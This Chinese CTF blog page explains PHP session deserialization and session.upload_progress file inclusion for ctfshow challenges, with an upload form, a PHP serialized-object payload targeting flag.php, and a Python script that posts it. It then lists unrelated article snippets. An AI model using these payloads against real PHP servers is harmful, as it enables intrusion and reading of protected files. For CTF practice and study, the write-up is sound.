session 反序列化
原理详解
ctfshow web 263
ctfshow 新手杯 剪刀石头布
这里我们可以发现服务器使用的处理器为php_serialize,与当前页面处理器不同,在反序列化的时候会造成一些问题。同时cleanup配置没开,关闭了session自动清理,所以我们不需要进行条件竞争。并且我们可以通过session上传进度来传递我们的反序列化串。再看我们主要用到的类。
1.在线运行得到报文
<!doctype html>
<html>
<body>
<form action="http://793869b1-2080-446e-9066-25f43d926b25.challenge.ctf.show/" method="POST" enctype="multipart/form-data"><input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /><input type="file" name="file" /><input type="submit" />
</form>
</body>
</html>2.接着上传文件,抓包改数据包,修改文件名为序列化串
<?php
class Game{public $log;public function __construct(){$this->log = "/var/www/html/flag.php";}
}
$a=new Game();
echo serialize($a);
#|O:4:"Game":1:{s:3:"log";s:22:"/var/www/html/flag.php";}
?>
或者用python 发包
import requests
url = 'http://d41097cd-f0aa-47e1-b486-4bd8ec57324a.challenge.ctf.show/'
sessid = {'PHPSESSID':'succ3'
}
data = {'PHP_SESSION_UPLOAD_PROGRESS':'|O:4:"Game":1:{s:3:"log";s:22:"/var/www/html/flag.php";}'
}
file = {'file':'1'
}
req = requests.post(url=url,files=file,data=data,cookies=sessid)
print(req.text)
利用session.upload_progress进行文件包含和反序列化渗透
PHP_SESSION_UPLOAD_PROGRESS进行文件包含 (详细步骤条件竞争)
1在php5.4之后php.ini开始有几个默认选项
1.session.upload_progress.enabled = on
2.session.upload_progress.cleanup = on
3.session.upload_progress.prefix = “upload_progress_”
4.session.upload_progress.name = “PHP_SESSION_UPLOAD_PROGRESS”
5.session.use_strict_mode=off
> 我们可以利用session.upload_progress将木马写入session文件,然后包含这个session文件。不过前提是我们需要创建一个session文件,并且知道session文件的存放位置。因为session.use_strict_mode=off的关系,我们可以自定义sessionID
> linux系统中session文件一般的默认存储位置为 /tmp 或 /var/lib/php/session
> 例如我们在Cookie中设置了PHPSESSID=flag,php会在服务器上创建文件:/tmp/sess_flag,即使此时用户没有初始化session,php也会自动初始化Session。
> 并产生一个键值,为prefix+name的值,最后被写入sess_文件里
> 还有一个关键点就是session.upload_progress.cleanup默认是开启的,只要读取了post数据,就会清除进度信息,所以我们需要利用条件竞争来pass,写一个脚本来完
2.过滤了. 我们必须包含无后缀文件
利用session.upload_progress进行文件包含和反序列化渗透 php中唯一能控制的无后缀session
控制文件名字/tmp/sess_aaa
<?php
if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);include($file);
}else{highlight_file(__FILE__);
}
相关文章:
session 反序列化
原理详解 ctfshow web 263 ctfshow 新手杯 剪刀石头布 这里我们可以发现服务器使用的处理器为php_serialize,与当前页面处理器不同,在反序列化的时候会造成一些问题。同时cleanup配置没开,关闭了session自动清理,所以我们不需要…...
PostgreSQL中实现数学中的组合问题
记得在学《数值分析》这门课程时,其中有排列组合的相关计算。最近没有想到,自己居然在编程上需要了这个问题,需要在数据库的一张表中,找出任意n条记录的组合,判断组合后的图形是什么,也就是组合问题。从网上搜索的相关资料,发现很多是在Java或者python代码实现的。因为数…...
编译和连接
前言:哈喽小伙伴们,从我们开始学习C语言到实现如今的成果,可以说我们对C语言的掌握已经算是精通级别了,但是我们只学习了怎么写代码,却没怎么了解过代码的背后是怎么工作的。 那么今天这篇文章我们一起来学习C语言的最…...
常见分布整理
概率论 - 常见分布(及其分布表) 常见分布的期望和方差 离散型分布 两点分布 有2种结果,实验只做1次 X~b(1,p)则有 P(X k) pk (1-p)1-k,k 0, 1 数学期望:E(X) p 方差:D(X)p(1-p) 二项分布 P(A) p࿰…...
ubuntu终端命令行下如何使用NetworkManager(netplan)来配置wifi网络
最近在给家里折腾一个文件共享服务器给家里的小米摄像头保存监控视频用。树莓派太贵了,找来找去发现香橙派orangepi zero3 是最低成本的替代解决方案(网络足够快,CPU的IO能力足够强),香橙派orangepi zero3的操作系统是…...
GO学习之 goroutine的调度原理
GO系列 1、GO学习之Hello World 2、GO学习之入门语法 3、GO学习之切片操作 4、GO学习之 Map 操作 5、GO学习之 结构体 操作 6、GO学习之 通道(Channel) 7、GO学习之 多线程(goroutine) 8、GO学习之 函数(Function) 9、GO学习之 接口(Interface) 10、GO学习之 网络通信(Net/Htt…...
CUDA学习笔记5——CUDA程序错误检测
CUDA程序错误检测 所有CUDA的API函数都有一个类型为cudaError_t的返回值,代表了一种错误信息;只有返回cudaSuccess时,才是成功调用。 cudaGetLastError()用来检测核函数的执行是否出错cudaGetErrorString()输出错误信息 #include <stdi…...
虹科 | 解决方案 | 机械免拆压力测试方案
对于发动机的气门卡滞或气门开闭时刻错误、活塞环磨损、喷油嘴泄漏/堵塞等故障,往往需要解体发动机或拆卸部件才能发现;而对于某些轻微的故障,即使解体了发动机后也经常难于肉眼判别 虹科Pico提供的WPS500压力测试方案,可以动态测…...
Python数据挖掘实用案例——自动售货机销售数据分析与应用
🚀欢迎来到本文🚀 🍉个人简介:陈童学哦,目前学习C/C、算法、Python、Java等方向,一个正在慢慢前行的普通人。 🏀系列专栏:陈童学的日记 💡其他专栏:CSTL&…...
深度学习技巧应用29-软件设计模式与神经网络巧妙结合,如何快速记忆软件设计模式
大家好,我是微学AI,今天给大家介绍一下软件设计模式与神经网络巧妙结合,如何快速记忆软件设计模式。我们知道软件设计模式有23种,考试的时候经常会考到,但是这么种里面我们如何取判断它呢,如何去记忆它呢&a…...
中文编程开发语言工具应用案例:ps5体验馆计时收费管理系统软件
中文编程开发语言工具应用案例:ps5体验馆计时收费管理系统软件 软件部分功能: 1、计时计费功能:只需点开始计时即可,时间直观显示 2、商品管理功能:可以管理饮料等商品 3、会员管理功能:支持只用手机号作…...
绘制核密度估计图
简介 核密度估计图(Kernel Density Estimation,KDE)是一种用于估计数据分布的非参数方法,通常用于可视化和理解数据的分布情况。它通过平滑地估计数据的概率密度函数(PDF)来显示数据的分布特征,…...
基于深度学习网络的蔬菜水果种类识别算法matlab仿真
目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 4.1数据集准备 4.2构建深度学习模型 4.3模型训练 4.4模型评估 5.算法完整程序工程 1.算法运行效果图预览 2.算法运行软件版本 matlab2022a 3.部分核心程序 clc; clear; close all; wa…...
UE4 距离场
在项目设置的渲染模块可打开距离场 把该节点连上,该节点的意思是,距离表面越近,材质显示值为0 不接近表面时: 接近表面时 可勾选该值即可看到距离场具体效果: 未接触表面时: 接触表面时: 产生…...
】26 - QNX Ethernet MAC 驱动 之 emac_rx_thread_handler 数据接收线程 源码分析)
【SA8295P 源码分析 (四)】26 - QNX Ethernet MAC 驱动 之 emac_rx_thread_handler 数据接收线程 源码分析
【SA8295P 源码分析】26 - QNX Ethernet MAC 驱动 之 emac_rx_thread_handler 数据接收线程 源码分析 一、emac_rx_thread_handler():通过POLL 轮询方式获取数据二、emac_rx_poll_mq():调用 pdata->clean_rx() 来处理消息三、emac_configure_rx_fun_ptr():配置 pdata->…...
VR全景广告:让消费者体验沉浸式交互,让营销更有趣
好的产品都是需要广告宣传的,随着科技的不断发展,市面上的广告也和多年前的传统广告不同,通过VR技术,可以让广告的观赏性以及科技感更加强烈,并且相比于视频广告,成本也更低。 在广告营销中,关键…...
论文阅读 | RAFT: Recurrent All-Pairs Field Transforms for Optical Flow
RAFT: Recurrent All-Pairs Field Transforms for Optical Flow ECCV2020光流任务best paper 论文地址:【here】 代码地址:【here】 介绍 光流是对两张相邻图像中的逐像素运动的一种估计。目前碰到的一些困难包括:物体的快速运动ÿ…...
神经网络的发展历史
神经网络的发展历史可以追溯到上世纪的数学理论和生物学研究。以下是神经网络发展史的详细概述: 早期的神经元模型: 1943年,Warren McCulloch和Walter Pitts提出了一种神经元模型,被称为MCP神经元模型,它模拟了生物神经…...
【单元测试】--单元测试最佳实践
一、单元测试代码风格 编写单元测试代码时,遵循一致的风格和最佳实践是非常重要的,因为它有助于提高代码的可读性、可维护性和可靠性。以下是一些常见的单元测试代码风格和最佳实践: 命名约定: 测试方法的名称应当清晰、描述性&…...
llava1.5-部署
llava1.5 ——demo部署 下载代码和权重 新建weights文件夹,并下载到LLaVA/weights/中。->需要修改文件名为llava-版本,例如llava-v1.5-7b. 运行 启动控制台 python -m llava.serve.controller --host 0.0.0.0 --port 4006启动gradio python -m…...
南方医科大学第八附属医院放射科胡秋根等团队:基于CT影像组学的肝内胆管癌微血管侵犯术前预测模型辅助临床手术决策)
Eur Radiol(IF=4.7)南方医科大学第八附属医院放射科胡秋根等团队:基于CT影像组学的肝内胆管癌微血管侵犯术前预测模型辅助临床手术决策
01文献学习今天分享的文献是由南方医科大学第八附属医院放射科胡秋根教授等团队于2025年8月在《European Radiology》(中科院2区,IF4.7)上发表的研究”Preoperative prediction model of microvascular invasion in intrahepatic cholangioca…...
,小白程序员也能轻松上手大模型)
【2026年版|建议收藏】Agent开发学习路线(从入门到进阶),小白程序员也能轻松上手大模型
本文专为想要转行、求职Agent开发岗位的程序员(含小白入门者)打造,整理了一套由浅入深、贴合2026年大模型技术趋势的Agent开发技术学习路线。内容涵盖大模型应用基础、提示词工程、大模型检索增强生成(RAG)、Agent智能…...
深入浅出AUTOSAR通信栈:用一张图讲清楚CAN、CANIF、PDUR、COM、CANTP之间的数据流转
AUTOSAR通信栈全景解析:从CAN信号到应用层的可视化数据流 在汽车电子开发领域,AUTOSAR通信协议栈的复杂性常常让工程师们望而生畏。当一条CAN报文从总线进入ECU,到最终被应用层处理,中间究竟经历了哪些模块?每个模块又…...
高效论文降重方案:推荐一些可以用于论文降重的软件,哪些能同时降低查重率和AIGC疑似率?
CSDN 极客学术专栏 | 2026届本硕博避坑指南 摘要: 2026年的盲审季,传统降重工具已经彻底沦为“学术毒药”!当你发现查重率过关,但教务处系统赫然显示“AIGC疑似率89%”时,延毕的达摩克利斯之剑已经落下。本文深度评测市…...
高效论文降重方案:2026年TOP10平台极限抗压对比与自救建议
先导章:当“查AI率”成为悬顶之剑,你还在用上个时代的破铜烂铁拼命? 就在两周前,某双一流高校下发了一则通报,直接让今年的硕士求生圈哀鸿遍野。有4名即将参与盲审的研三学生,因为在学术不端审核中&#x…...
前端包管理工具对比
前端包管理工具对比:选择最适合你的利器 在现代前端开发中,包管理工具是不可或缺的一环。无论是管理项目依赖、提升开发效率,还是优化构建流程,选择合适的工具都至关重要。目前主流的前端包管理工具包括npm、Yarn和pnpmÿ…...
【C++26元编程革命】:从SFINAE到`reflexpr`——6步迁移路径图+可运行模板库源码
第一章:C26元编程革命的范式跃迁C26 正在重塑元编程的底层契约——从依赖模板递归与 SFINAE 的“技巧型”编码,转向以编译期计算为一等公民、语义清晰且可调试的声明式范式。核心驱动力来自 constexpr 语义的彻底强化、std::meta 库的标准化落地…...
Python数据可视化实战:用Seaborn boxplot解锁数据分布洞察
1. 为什么你需要掌握Seaborn boxplot 在数据分析的日常工作中,我们经常需要快速理解数据的分布特征。想象一下,你手里有一份销售数据,老板让你在5分钟内汇报不同产品线的销售表现差异。这时候,箱线图(boxplotÿ…...
如何突破iOS系统限制?探索TrollInstallerX的技术实现路径
如何突破iOS系统限制?探索TrollInstallerX的技术实现路径 【免费下载链接】TrollInstallerX A TrollStore installer for iOS 14.0 - 16.6.1 项目地址: https://gitcode.com/gh_mirrors/tr/TrollInstallerX 在iOS生态系统中,应用部署一直受到严格…...
Agent设计范式(2)Plan-and-Execute)
AI工程化设计(五)Agent设计范式(2)Plan-and-Execute
Plan-and-Execute:比 ReAct 更“有全局观”的 Agent 设计范式一、介绍1. 什么是 Plan-and-ExecutePlan-and-Execute 是另一类非常重要的 Agent 设计范式,核心思想可以概括为一句话:先把任务想清楚、拆清楚,再按步骤执行。也就是把…...